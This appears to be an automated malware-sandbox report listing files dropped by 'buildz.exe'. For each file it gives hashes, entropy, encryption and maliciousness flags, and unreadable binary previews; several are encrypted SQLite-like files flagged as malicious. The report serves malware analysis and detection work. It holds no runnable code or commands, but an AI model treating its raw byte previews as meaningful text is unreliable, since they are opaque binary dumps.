                        Preview:<?xml..L.).....s]..ax..8.z..z..._.h.tn....`/gG~z.doc.b.....9........CL.z.k:.2i<...k"f(..p.P.XW....=.....T..*(.1....wU.y.gg...#W.$.{.<....rC7....%..-..).!Je. N.`..."(..y....._..:.8.7. RmbJ..........e...G.Jm2_..E....t.5..\>'......M.6h.zA...Y.!....".....7..\F.0.U.uJ.........1l..........O.cC.[.H..m: .^.h(.8..$w.q..#-g...>|..\N.Z...V...B7..c.O....`..H..&...'..a$.. ..x?F.Ut..5..!v...7.Q....c.y..X.qW(k....;.....NNG........_..0Cz...*.UqL..M..akU............W..n."X.D.\....vPP$...h.I3}o....M.#..A.../.`=..&<E..._..#"...E..m6.;'..jY...<b.t...C.+..@SC..e..M.9H.....?.......j=.x........+.0.mk+._.../Y........k..S)q......(.nR...v....)....u......f...l=&..^z..v.\.....k!.h..o.,b6_..:.u#.~."D..M.Ux...a..N...k.P.W*=..B...'.@.e..,e.3../=.s....[t.p...YQ.D.b*.O[A...............}..., &....Dbd!....&s...K....P.xL....b....#...A.....SK...q)....K....e9.v?.Z..a.X.I.$.D...&bk..[...........2.._...y]......T`..6....,#...-...[.T. m..IM_.:!.z.8N...a..c..Tu..........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):320676
                        Entropy (8bit):6.63314513323505
                        Encrypted:false
                        SSDEEP:6144:Sb5Dtw92lW/x/vGQJYzr9twWBBzmfnDYSu:SbNteRvGQW7lBSLg
                        MD5:E5FA996CD23490E24B20C3F96C86F127
                        SHA1:93C5424421B737B107B1F86C2D38FDF4D8ED016C
                        SHA-256:2447BF4901ED770B8412FF67CD09011726D601EA5C10B706C440B668C3342A09
                        SHA-512:459E313BC6104C4AC03EB124F79D92942E2CD8017A7C64FBBDB3DB98FF5009D061F020B441763892FD18968235584392E55F8CE080F5E29F1BB2F38CC6D2C26D
                        Malicious:false
                        Preview:<RuleG..9.h.z[.;n..........!'.3....}v9.!p.L.x`..". j@.V,w..../g.@.+....XL....x..K.j.u..x....X..~.**....y..[C...@L...f...p..T..{.&O.......9....P..j.........L.T......^...8..HA...@>G.|.sD.H....L..E...*.R%m...H?p...".........@.b,0.p<wr......X..h...g......BP``'.$.#.f.R.`.?...6.aC.^..]...!L...=...#a..g..:..@...../+.V(...7^hv.z.01...._.).%$.9=.f...G..yd/d..M$6...a...C.L.o.gL...^.......s./LjnF......s....d..r..5u9,O..8..m1....b<m5.(.P.J.$7..3m8......D..7....*...@([.b...L..S......6h.X..>H.\.9bQ`..u.U..$q..E].j....d...../...4...G5.*U.6.;V..s ..#.g.......K^|.b.|+S<....S.P....*H..1.1o....f..h.H.;....A.v..._..vZ.r.3@....&....N...=...|...#....-z.......!.......C:^.W3.Y.k.z..2....+..g.`..CQcyz..<m......e.%,/......E.C.).o..^/..-.9..X^.v.d@O...'/..mW-.b.a.|.....l...v|P.!.G}{....~.R.t.=..Na/...hF_..c........^.r..{Q....l.d....$X.....T...h.........[...nf.y.h....B.B...-.....b4....;.. .!9....o.:..U..j..S.9.1.i.K.>...}.=.A p.n.w.'..|od..K.eQ.9..*H%.rR'.N.:nG~.f..xy.?
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):361051
                        Entropy (8bit):6.5143197290241615
                        Encrypted:false
                        SSDEEP:3072:1XGTDDxAAx6MMIwKUgm6w6+6biq5HbY3wvUCbl4LSbM/QRmfsxA:1QD6AfMfpPq57K6hQmm
                        MD5:24971832E45E4753F5D672CFFB4AA58C
                        SHA1:0F8CEACF97A8EE142849AEEC9E2B20A8F5B34E4F
                        SHA-256:D17BFD1AAC3A04928830C93D6FEA96163E3B7562C5D8CF50740C57C1E622BF0D
                        SHA-512:A0782ECF97C52F4C54C3B8C36E964299D6B5ED0D05FBA04CDBC90627AAE25EF0E4CBBFE37F929CA20814370DCBA6AA8BA2312EA74FD0CFD08D98D20285970FA0
                        Malicious:false
                        Preview:<RuleG.2...J?.S.3E-..vqM......c.R..\!.;....J.+.f..Y.n........X+...n..W.....{.5....,.a...Fqn......B9kQ...~...B9h.f...X.,..ql...v|.6|.J..z..U..H.SK.......cP^..[.%b.Ch#....u(b]M..2....,e.[...f....w0..z.@..K..{8.K.e..[.;.zTl...x..y.Y9m...e...W...l...g..>.uZ..._'22..(.d.>9...Z......f...9..ED.T...fV.eQi.9.k....q..B!.u.u.c.C.@Y.l.R_....q.f.j.^Q.`....;P..?....F.z.{.^X....#...V@9Z".v!A%~....p.4..i.}..5.kJ.dA....J.3.e:..ih1{.F...@..R..%d..1..[...Nx....R,...I.N.[.q.M].....KN.pH. .%..a....0T.%...wOscZ X.j.......~9.Z..p...f........{Ie+....^n.....}Mn..P._{....9.2..W?....e.../.....C........aR=...{..Q]..L.o.wt.I7...3.`^..W....2..|..:6.U......h[...4.a}....R.E..+4}<. <..R...K2..)....z.d5,.R}u..E!.......D...uh...2..H."...`..|.q.IZP.=..../..(.e.5%..JZ..\.h3q.tym...@.#l.!.Ee.#n.@.U.G.kf. ......a.. ..}.-2T^6-..t....Wsp..H.D...1...b....X...}.p4...zp2.N..u.....g....S.,..3z{J!.......g.K......$.#3....1..>#...~A[ H..;..._..A.0...B.LuZ...}..h.F..S.t..x..e$...g.a..WT.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1098
                        Entropy (8bit):7.825959793052474
                        Encrypted:false
                        SSDEEP:24:64zfJhPW76yVh6+kvSTC2Abgr8IPiBCkmlHgW2jq1gTHGbD:6SxgeyKv2C2ouIUkKDyHUD
                        MD5:CDAE0588FC36D51416DBEA2673DF5785
                        SHA1:13D42851625B9FC53D22B56EE41B0E78D3C99441
                        SHA-256:FA7BEC8E95F31C29EE4CE908E17E51635B2981C4F5D6A80D38B8C79088FA6460
                        SHA-512:18ABF8B0A836D5DDC417A4C1242B08B71DC4F955CE70BD5A48E2D9557D94CEC8435DED8D951A818B881AB60837B7673DB3D41A16F1DDC5D5EC498F7B39A88E1C
                        Malicious:false
                        Preview:3.7.4..x...`&..(.u.5....y..E..;...c.g...DD..A..)..Y......s....E....'e..u/q.X.MF=,\...b._/DI.i/.pW.....5..z..%.....7i..P..}..0.E%.....z~S..f..\.........a.... ...i..@.Ua..... ....kQQ.u.30Rb........-..q/H1.t......n.PqV....)+uZ|.]..;...C...\.I2......n..N.^.$....]..pjz.../.i..K....z.9.2.A..r1;@6..\...^......]d;...d!+77.*...U...1.....9..z.re.:.0..)Q/..!R.Y-Gm.4r..k..N~0...[.s&..p...Z.....7>0........>f|.N...x...L"..U..Y.S.]p.4.x..]..N.Sz."#a....P$s.*x.......,..+.Ze.C7.m...9..3......:..........e.Cd'.*..Q..)....&.....E*.S...x|..''.."..=.....I... .F.........1{..s....DXj..;j.h!..o...r...X.o,.....$.E'i.....K...S^y.(..x...;.o..F...G..F...D.[....g/Rf..w.O.L..M.y...WI.b..J:+.....j...(+...J..mj...w..e&W.V.(....f.<r.3$.k,36.F..x.. .r.b v.e.3.=......j.ek..V/4.pD....t..C.z......SR...NJ...13.].....g2/.R.G..V0.Q... .....n..H7"+bw...&..{.{...".v.^y1f-.........."I+...#.....f..."7k..._.?u......6gTr......A.HL.........Rz @.W.n....q';..0...1R
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24910
                        Entropy (8bit):7.99149572574823
                        Encrypted:true
                        SSDEEP:384:adqJlosQuTHol0pKIU2DVqdD/+SXSlcHwx8N/loycsHhCHDiFwyvGY8OSA:adqJSszs6M+5aaQHFAqhs9dA
                        MD5:B9B1BA414AC311DCD5989FDC9EB903AA
                        SHA1:B041830F6AB4CBF25FCDE3247A854D0536252062
                        SHA-256:C6DF9D1B62B27E3AEF9B466EC0BB697D233C21BB40B424563692106DFC989BE5
                        SHA-512:EEBEE8E4801E7B65D827A85E0FB074F79933D297875D00E81D0D3E47580020DD709230EA2F75957FD3289987C18CB3B67DB2DA8C26D5416C13FDA29C9AC0E7F0
                        Malicious:true
                        Preview:SQLitP.L..wc.;..Gs.].x.p....w...Z.K.m..?..F;..#...".1S........wn....~.....~..V.<...|\....M.R?...8..a...2,..LS..VK.....P].q1....^lO.,.F..2.Gc....].]...c..N1b....,Bu...mTe..j...i`d.el.X.e.].....v....w......\...S.R.Iv...m.5>7.au.q>.....oS....Q.<Z.VQ.M......."..C....#.......T.p}...j..R.|...P.....b...L...aK4+Y.ho..z.p.....v.......h.Y.6.:...x..!...i......bi....Q...... .&...~.e....n^.?.Qb.C8.?..R..O.Rw|.......W.@...E.q....u......)....CcL<.D7.s`....&.IF....z.<....\.:MeH..-...'....u*c@...C..j4}d.A......L..W`4%b~._..~.w...|"W..&.*.t...&d!.....8.,Q.j5.kl6..2..YV...:..*.X...,.......!..1..Ov3...#..E.[.X.S..0].y.6.(S..|.0...BP.M.)0.`...'..%k..|OZj G...{..?;c.....)?dy.M..|-_.O..p..].d.u."Y/........q....E..[.uC4..i.t)...P......7.IQ9..D...Vp.x....#.:.z..k+...??.Y....C..T..........lK8.a....S.......a.. ...q.U.....Dc..A......}.q....w/N....F.@.e.GNjG:.R..u...z?..Y...|k;FJ..>3....Cx.S0.HW....u.....diR_...7.g.V....i....2...w.&...>......ZW............rp5Tc.A...T..R..D
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24910
                        Entropy (8bit):7.9928370551062855
                        Encrypted:true
                        SSDEEP:768:yvwGCljkfGvYptxgcAh85vyxy3erRSvBGKHA:fsNgV85vyTMoUA
                        MD5:E6C0B3EA23694EE6360C6C911C306534
                        SHA1:D02C2EF80CA5E7E13CB53E9A0A940581433E53D0
                        SHA-256:5A182D2F5AF001972798D5E4709EF38E041413921ED8518B0BD735D3265DD60D
                        SHA-512:2DD434206E527176DB03FCE456E69BA857FB8518F7E75CE320F5AE66FB85CA63BE9EB9FEC2894EF5B6C8E74ADCC4D4C82721602FD03134CD45C2CCB2335E0848
                        Malicious:true
                        Preview:SQLit..E..n3...R@?..D...;CW.6...;..C~).w.C.Msn&nG.....gn..l..]d3L..oe3w..[X.5..RAU:h....?..x...t.....Y.e....<....S8.UL=O.s&.#s..MZ..k^F.{....0E.]e%..4.?oN=/.....[..`.........I.%...2.......B.....F^.z.Y.5..|.......v[...P=./.`...U.;.>..#.).L..._W...U.d.8.:..s.M..Ryl.._0.....F..3.4......?.5...p.l.5.ke.,U.2.N2..]....cr1O..7.....?..~.....gF....ht<.&..nM....<.V.7.d+....do.%kU..T.......k4...A4...%a.d.:...WO9.P..V_B.w...M.kc.tF?..R.@.....d.:v.>...d..c.C.t..7.r...z..*.Q.8.?.hE..."..o........:J`hp;wCr...>.v.fK...|.+.b............sV/.r..B``..gk..DY.p..r_G.>>....1F.-3....69...t.t..N."...$a.~..FG..*..$..s...~...|v.M......l.......K...&........wVM..DWC.)c.G9.+.p2y.$.,8~...%.......gV\%.5....I.....s..la......(Z...O).E.6x}.rP0/..l1..n..`j.050r.f...N.E9..nx^{,..v..l.l~.J.H.1Ah..,..y...1tcIe.G...0d....j^&.....d...?.^..J.,ry...=....co.P./.4......J0..5....h...%....S..o.>Wb.=gHY........W.I<..^\.k.(_...I-..s.)6...K`0...{..pw...B....\v.H...&.....T..t...j..".
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24910
                        Entropy (8bit):7.992502053034265
                        Encrypted:true
                        SSDEEP:384:PcHsSCKNcR56rgo6z4fb4bz41g+Vz9TwXMw4Zzo8WUh46H8ptG3PqP0enBiD1HA:XKsUrgRIb6z4n5TwXWkqcpaqPFnB+1HA
                        MD5:B065E6A1D9620197A4E612C6E1F498E7
                        SHA1:5B7AC500AEFB0AC7B47C43E00674EE43457C397F
                        SHA-256:B554F581EB2C743B53A081A8EBE0495CADC5C233E27138E05AB117176F9F65CE
                        SHA-512:2A544A2D674FBB89259258B1768AB097537CBB10636929023B93D722E2B4E25EDCE66C5199059E3106713289C641C796A3BAA47AB8EF49C0DC2A687782663B4A
                        Malicious:true
                        Preview:SQLit......u...\.&.>&....2..m.'\.._..k.e..3.^!..gS.vx.bk..T..Do..A...?}..z.m.Z..m..-.J......}u.(....q7.y....+...{..4.....]..YI.A.....2.K"....-...._.|..U.8mu"..~..".X...0....hx...ys.....3..X_J...J.#....}....[..".:.!A....s8..[..W$...3OBYWD..BJ16.`y.......8.....A.....1..\.....(...-.\..O...I....Z..uEur-.$..Dq.f$.?.{..Qp...`%.+....,4.q...V....3......x....s5.`.!pW.[.6.......+....m..f.J.sa.j..Y.Y._.ly......m...~....b....x+)..L.8...3p$@E0.......2__........\b|.....1*|..B.=...;... .5/.&r*pE.....J{......."..`...u....n.C:...Rp..S..-g.....rE...{.[..d.sy. ...P..%.........@. .}.K..C....;.*w.X)..^|l..[..%E.. kv.t..yaZ.zn6.r.A.RT...I....x...<...S....@ |.g..I.i.(...V)...M.q..^...]..Q7.{.....l.T2...b..{..l..J..Xw:..p.\J.....le.?.**")u...........n.<..Kt..w...u...*..* ..!.+.?.n...koMo..V"a.{m.GO.5......^E.FBV..,2...xI2....WyZ..F.r....{m.o'...:^.......C*<..-...s...<...GZ...D.Y..U..... ....=.S.`...=...=...rN...]CI."..g..=.t4.X...9..G.oO.-."^...;.?..-..bi.vC.e.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24910
                        Entropy (8bit):7.991932853942327
                        Encrypted:true
                        SSDEEP:768:OzrSZUmKuvkRoUkTRFlotzQIHqn7EP07A:iuvkRoUkTVWW73A
                        MD5:D94B5D9B83E7D3E8A8BFE4A43DDFDF85
                        SHA1:58351E344C933B70906AE7458A726759168160EF
                        SHA-256:BCDFFF3362357340421F3E44E0664F3C200AA282AABD89EE971C726285BF7BCC
                        SHA-512:D04B2F0BC2A319E4B522497EA59230DED5379724126062E065D68274636EE3341A688FC3752430012DB8AB5066365BE2C2A1006EA2CCB9A67BF6EDE7917FDD31
                        Malicious:true
                        Preview:SQLit.*..Zk....?......-.I..iZ8..[E.4....L.L..e.11S.Q..'...s.H..`..@6K*!.....Z.=8#W...z..bI(B.>..,M.H9.......k%.b..Ra.).hl..ZN...E0.@.qL.....0.c.?.....i.........x.s.....$.............uP.9$Yi....ql.I.A..&..PL..- .......c<....../......j\.......o.....\6.Of.s..).R.8..b....o.VV...b@.......M.....E.^..-E.S.4.2B.N....c.h<........}s..3..?.(......)..m.{. ...b......X.!:.x(...\.q.~_h.M..i.i5-.I."x.}Yq.X..#.&.S..N.V....sd...w..r.4.(.9.Q...i^..d ..."...6..|uz?...|.J.0w}S\z...!..2..o.."I...{+W}.3.-.4M.b.....j.wW...Ux..P...{.P._.....T....]-..2yvW4..0...$..?.......R0'.b....0..e.wl.W(Pm;..s.z%r.3.....[.......P.J...W.....&G"....Q........+*.rh|)).....V... .z......[S....|.bV).f.<.ZJ?.<.b)^...s.^}9.....o.Yx.${9..Q.....|QP.H....9a.H..Yv....9.]}.7....5..c...gV...R.......D.._.e.N....0.(..=*[.%f...&.5+.;..}q....k.M.O..ZA.`...J..p!..~....dSg..H5.T)l_n......."...7.."U..tD.->c.B6a...3.6.i{......:.l]F.....;r.......+..Qf.PS...n....P."..,..Y.B..`...2.z..QA@V
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2612
                        Entropy (8bit):7.926866187309733
                        Encrypted:false
                        SSDEEP:48:SoTDND8Wng5Ifo1VaprW8S9nnKGxVdoxbA/oMNdZtCd/9R9mxDsd4btUD:RD2t5+iaprWJ3zd4kNNvsf4xK4btA
                        MD5:EEBA986C951545BC853B342D568E6F41
                        SHA1:685C0E90DF0C0F33D2BDCD2D2F896F679CFA179F
                        SHA-256:C06C995FDD48377E3EDC1197565EF2F753C63D1FBA5588B553718464AC1A5DFC
                        SHA-512:B582F5F0183494C71B85BD0C24986716533BAD9D6DAAADF9E4538C23734B7FFF792FFC92EA62994B1601E51CE09E97BD9C198A79C2353BF43D5D8D51E37DFADD
                        Malicious:false
                        Preview:{.".T...5..T.x..t.D'f..l......<.....g..l..A..B.US.4..S..u......U]@qK.n.+....C.%.u..0g.w.W...3.:`,%..........]p..........2.."&).3Z.H,...g..3.....\#.).....:.tT.}1.5M..?.n..H# ...&....T....m.M.467.y......T.Wi.6.!.......V..`......>.{.djy.v...7..."........2.c........v.cq...../.........?zba.(.zB.@..Go..n.[p..R..w..2....S.....t..j=#5i.;KF.R..z>".x...y.....L../..R....z/Pj.f?........t......P.he.':.NG?J.z.$S..l............T.tS'...AjT..56<..e..U[..."...z..g..4M..?.u_.....5(....L..~.d.....(...5...TC.%......z..].R....z).X....c.........u....X....|tLG.f.Z.x...........}..0.aY.:N....+.F}.'..r.01..T.].iC.l ...(..&f|U......E...J....B\..M..*ynK.*$5Sc.T.+..>N....(.Gv....W@'.i#.o....[.c.=6N......[*m.BK....F.)x...*t..0..As..m@.ePe.j..l.B...Z*M.B.?...ofp.4....<.....d!.3A..z.,.h5...%...K.O..UI..?..wso..."..tc.;m.n9...i.t....1...l...;...^..(...?U.`-..........f..0.%OxR.,.I...nL<..t..Q.1...#z..W.........Q...<.g.d...tC...U.s.v....nw..C.8......N.Z........u.O...@..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2612
                        Entropy (8bit):7.932242699124162
                        Encrypted:false
                        SSDEEP:48:tXlodjCPED39PWNuXQgw4LYQXugBn8ECNSlywR1GplgMGOwkqMslUD:tXad8EjtWIAgw4LYIuIn89gAwn+lgMGw
                        MD5:6E32F0A8F3EDD320961FFAC8013853E0
                        SHA1:8617E371F82961C444E1E3B3E23EF71BB182A42E
                        SHA-256:D82ECED86BBAB2194F15A610C0DC8F09F0DDB4C262F22339CD66EF4EEA22B0BB
                        SHA-512:394C28A9DAEFB21122EA7DC4F2AF05F67CBBEFA243F74A49E105BC89767FF7EA62E107D665DB9B3071EA9FDA575B5F5F7C6D6C9C12C4E4EBD33FC29A1AC9759F
                        Malicious:false
                        Preview:{.".T..d-i..u....W.k...9....L=........>.l.}H.j...x....~...v......?0;YhsLZ ..+C.A.k_....c.'u~7uMp..dR.....[.tr..=.b...zJQ..o.;W.{.8}..n......1...f../....}...0,D.O+n....{.z`.....PIN..s|xi..,....Q.y....t..5.....?.41....<........p..cz..@=v....?&...nD..k..1..#qo6.].....:rj.2....Q./.u9fR..5.>H.LWc...cG2(..Y.Y.E....0..m..>..>i.3.#yw..R...vP.....1..+&^.z...V.....!Cd(....T[9..CX..G....]..>.l...L.O.gR.,!....vV...dB..*....)Z.C......SJ.?u.uu....>.*....=..9..;y9".......?$.v....J....{...ON[.........q.[..84.{6........wm[AF.P.^0.yz......Ek....>.m.V:......R.n.-.. ...8*.L...C.2..B..'.I......../..`...guZ..^c..a....S.E.. .P.MSl......c1....|..D..cQ.?...S1("Y..j"...}.I...x.9...5\...2..(7.Wk.....n.....vU.N..U....g.8r...mee.F2z.%:w].*...m...dQ....v...k..lrmn..).P.w;..y..;.....Q..3.W...Tq_..o....c.........Q...;...P.......\..w.;K.#.Ql@.K(/...F..md.....oU0Nc;2.PM.U......<......:...6:.........qz(..`.ZV.....z.`..B....OI.../.b....t.i..q.N...q......K..y.J.f.R
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3018
                        Entropy (8bit):7.930906451943714
                        Encrypted:false
                        SSDEEP:48:0RVZWa2inrqVHSxL/Q15RpWYIbWWmWMapvKp18W9jP2qFBofSk/AvbML/NYpIUY6:0RVMa2inKSJ4pQnmG0KujdFiL/UbMheb
                        MD5:FBB15139603CA87903CE3960A9649A69
                        SHA1:87E4F26C8036B46E2A487840F9B068743775400C
                        SHA-256:1184F20423F1B62718B602E615F038D765CA184D58A21C548431CAA565A80105
                        SHA-512:4C19C0CAE22C1C57F3A2E9E3963AD69648D51ED194220C68B2C2D15F8E3D503D82A11A27CF7F8AD046780271C4C41229CD93E504DBA2ED191B5DEC57F5888867
                        Malicious:false
                        Preview:{.".Tk.........P..4.%..G...+.h.[....=.8.]....[j...i.}t...}.6_..\.7q.....q...O\s..h.!RDa.~D......./...>!E^$..%:.Y"f#<..).A.....h..2G....mS.j&>....KH...|OO.sW.....9+{[&.0,8...sg.......k//._..!A.J...#.w.V...QqOM..Qj...U...M..$.....Q}2..?.S..'V...Q..@BJ.D...U.\Q..1#...n..4...WiaV.O.Ua...uT.B.N~\B=H.,.4%..zOed.....`AiwGc...>...&,*..r.N"..Q<.S..P.8m.....YD..ORU.!6...$...b.v.^....;.8..3V,OR...U...X....A.T.....kA.{x...4...lY...j9QL..k`.....{EX....qt. l..-..s...S.B0.;Qyj.ru.Q.H? M..M..C'..3.Y.N..L.r.......N...........Y.-..3...6...~............4.2.~phF8.EA./...U...\.`...H._t.v...s.HZJN. ...3}R...U...5...3.....`B...c..'71....p..k......M.16z......Kh0.....V..9.u.e.]...........&~..}.F'.D...g(.l...{.'N..j.|..../;........$.7.X)..&..?p.`I........N....ex/.$.....<.kN....F~.P=.v....J..*J(.m.A;..<c.......x^.&......:5........J.D.g......W...9\4;.\.]?.tT(.y$.3gl;...*.....Vq..1...$.t..u.G.]w....[}...qJ..!A...`.?..M.....+G]N....;.Nb.....T....t..XO..2....e.W.dJ;.M.....jq.9R
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2612
                        Entropy (8bit):7.926178927211946
                        Encrypted:false
                        SSDEEP:48:Gsj5p0T7/C4/RmknMZn4AQSOvNc0+YzGbk+YozZPOmc+EyX1Smb3vCiir0iUD:GfT7/C002Lq0+YzGQ+NzZPO5+ERMC1bA
                        MD5:DA0AB699AC147E7FFBF230F51F581AE5
                        SHA1:4102E7328249753F2B14F013B94378794919D701
                        SHA-256:7F1D3BB8804BB48C4B10C7B39ECA3B9C6253F9D193EE17352247DBA338EEF4F0
                        SHA-512:BF19BC1432737208B1C637D6F72B688B25073E8ED95F78661A1CB199B755758469CD453123648E7F5571A90DB8E0ECC8292037D3B5A7533DC3F5BC4920765057
                        Malicious:false
                        Preview:{.".Tr7/y............*.d..z:.J..m"..<D..f.b.U6'o.?Z..V2^.L...U...#.I...+...K^*...9.......P/M.d.R...`!>{.6..Z.4.>|.-*..7..p....>%C....C....=...#.q.........:.."y@...}..,...s.Z!.q.|...w .%.3.5.d....p.Hy.}ra[|.......M..G.....SdZ..l.SU......../Y...^.$... .R^=`.!5..g..i.$...]S.M..w[l.F.b.....M..s.s<.@og.ZU..\1V...*8N7R..n..N>......a....PC.'.MW..i .3;....+.~.X......7.E....t.x.......1.........|I.<,.M..H.....$./...'..k.Ox...w...<{.!.....R.....c`..G......pk...,.....D..t.XC...j.).}..u..Ad.-_E....j.W......$/p..-...=yV.B.d.f....(1Jt.j>./.L..3..Ki...b.N..t...y..fz...9.U..n..x*!.*.....9.. .. @T.Z.`..nPu*.....D...M6..hD.s.z.Em...F..[.IK.e\...1..!j.......iU..W.+L2.$^%.m`h .....`........AiHXb..."..m...rB.9...S..m....^.x...P<cq..u..S.o..}....3..(.G;~Ocv....kE}....0...o...@...I.U.{.6|.MB.Go|...R....[..1....>.6.-C.(.S....i[.,.H`.,u....W.8...7@CIFNA.cz...-..FB+el..9....FG.z..(.Q..9..J..|b......^.U..............y....>.[d.Bo%FU@e.Dx.....%#<K....{...u..3.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4956
                        Entropy (8bit):7.954876434216311
                        Encrypted:false
                        SSDEEP:96:9L1rAG0EswTYjum9XDJxcrWx4CpXo7f058cmciqnJYuP4d2FveC3edtwVAA:9LGGJswTYjum9XDJxc64CpRCTDqnJDV/
                        MD5:2E224D7D722D01148CD2336061C65FFC
                        SHA1:A928E06776CF04C466634B2A24D876B06A223ECB
                        SHA-256:7C94C9A353611C7F8D6553DF5BF09E908C04971512847A451BF968DFA48A93D5
                        SHA-512:11403F5902821F7A1B21B1423A6161848EAC300D6717AA2DA20254F0C924ED427D13187BCFA90EC45F82FEB51C02EA3ECD217F16427ECED3CCDAA43B56A96680
                        Malicious:false
                        Preview:{.".TXT...2".$K.2&..^.....ho.[%...,KWb1.G.$...y1@sa..zO....)....]P.".@.~..Y.1...u..nR.;.zw...S........4d]....,..B.~5L..1.....X#...3...2..&O...;....8....i..&...;&w..;.(z.=" ....y.e.E.^.:q..H`7.RX.)...._2..0..9.aWY@..DZ....N.gYy...dF..q.WBD.....w...........$Q.Z.Y.b..(....HWN....Qc.G..s!(#..L.6..:.wv.D.X.i...~~!..x....Ob..8m.7..Ln...00...d....+."#5.?q....7h.l..3..=.........A....*g.:..F#F.i....1.,...;P.. ]..{..u(\\.].(.L . .,I-.3>9.c..p2...+`w."]....r...g.m.1.t...b8...N.:..m(.j~..Y..c.)(....:.=....gS.n."+.....,3siW..e..F..#........y..30..M..H} .x/......N..]...$.[.M.....y2/..........)&.k.e6..-.N!t..!...m8......K..........i....[......p...D*.]_....m.6.L..FU.4...^U.3...h..X.\....>%.'Fc...5|...R_......[....}...(.)4...j.t..4.l.?.p.v?.....m.Z.D.l...X......p....Xqr_}.3^4.p.x....S~P,...q.}]..F..zj.CE..>}w_..z....F8...;Z.\w.S...b".../.....bv.0/....$.[....j...R+..i..../Z...lp.......".WV5...`=.4.k*{(......0..f.>mA..S.Q.....)!t...j1..^..<.?}..nP.I
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3018
                        Entropy (8bit):7.938715952469897
                        Encrypted:false
                        SSDEEP:48:vfPecw+1259xSBwZjEk3rYW9Fz7Iq2COQx3w1XHaXsVWxc6EWbLE//IT0KTwTXB5:PehfnIBwtHXMq2C/32QskykE//hKwmA
                        MD5:F6A5F29F9A2B5AA473E14422D792C552
                        SHA1:2804A1C3B5E86AB35B29D3E7D30086E4C35AD2CC
                        SHA-256:A9C356EE3C1480C9E92989CD033651CA08CC4A26806A7616E3278AD58B7AB2CE
                        SHA-512:689A2E46F3B0CF9CB364AEAC43791A4501855D40311CE2BE82C02A3402F56F490FC49E26923041AC0CAF8311BDE33C7780BF1035EE7BA160EC137F7C9F191787
                        Malicious:false
                        Preview:{.".Tbpe.y...V@..CX..<.8.h.h>..I../X.1.CX..B..$.\....Y..w..?.up.....1m~.ZPM.v....i8/......+..oc!...Z.6r.....[..}...u.....q.2._..i+..n5.v~...X.2.n..0b....;lQ..6b...d.>...I.3^n%..0'@..6.Rn.y.....o.\.ls..w..,....y.8=...Z..x.P...0.)(.j.b..e...c...X..i...:.w....|.:...8{.C.s.e.).<'0.._w."k..H;U.v...U.tG.....b.T]..\....f.....l........tV'..D.r|...|@T<fy.U.."Y...`(Py.!..Z.&....A.H..E......K..N.........<..e.|T.......85%Q\......](..0.'g...okm@.....|ZQ.<ON...C.......!.]....v..}..4..T......o..^.X.=....@.:.1E.'.....o1&/..a.~aF.eu.8h...t(.D....?.....x....{.@.q.r._....^....A(..3o............u...`V...P.....?.2... z. .....4D,..s.X{..*.:.d.u.Z.b..J..i+*Kk.......P....Zz..g....P6.I[.....B....B.|]-..sv.]...`...U.q5l....-A.4..5c&.h.-....1IR!.{f...j\=t...{}.C.M/.....K........[P...1........],......jv..'.>..*.s...8..J."8.N..k.42......B=.#.R...X.&e....Wu(r...,..J. ..(B*..B.....Qo..e-.A...(rV.?(......W...W.O.E........X......n.+...&.F.i.n..nf...V....# Q.^.[
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2612
                        Entropy (8bit):7.922987819076168
                        Encrypted:false
                        SSDEEP:48:kltx5mkX1DLXx+19xS9ir8xPiGtgJRoA1txYnLdkr4/VdfwKBpeiF16qab8lOiBE:SjJX155cAE0gJRoANYLdrf1IiF16qa4m
                        MD5:DDA98E6F9573BF25FE44F90779DAADE9
                        SHA1:B20B69114CAB47452DD98488F91D62CF0508C129
                        SHA-256:7D10918C03DB6A67E937552DA4D458060C30B1F90E322E132CCF5AB98DA57F0D
                        SHA-512:A3D258E4661DA37BA8668CDDAB0FB6CE5154B6A78FC95BD06651DC5CC60EB27148D5051B49630198A5E2EA4F64393E11127A18364F955BFD24F55F6FA4B9CAF7
                        Malicious:false
                        Preview:{.".T.?.Pc.g._.9i..B_.^.N'._]'^..%.(....P.P8....T\.Y.3.q.3H.Y.Jz.Yl>....K.W&q.T.n..OI.(Z].Owp.~#c..].W"...|.}.m....W.qN\....b5.....r....5....v.....T.~g...j.1.'._..TP.44..p.a.........V....~..R;..].1....U.*.r7A..U........a.p.m_.........~....F..=..S`.@...n....C..v2.{...............4..~..)bX..P._......lXe.h.....<.4]3..Z.<7...:.{c.t$l...>y.|.*nO.)..^.wb....k.}_.]..Y.....Zh.. ....a"M.`...i{r.#m}.PQ 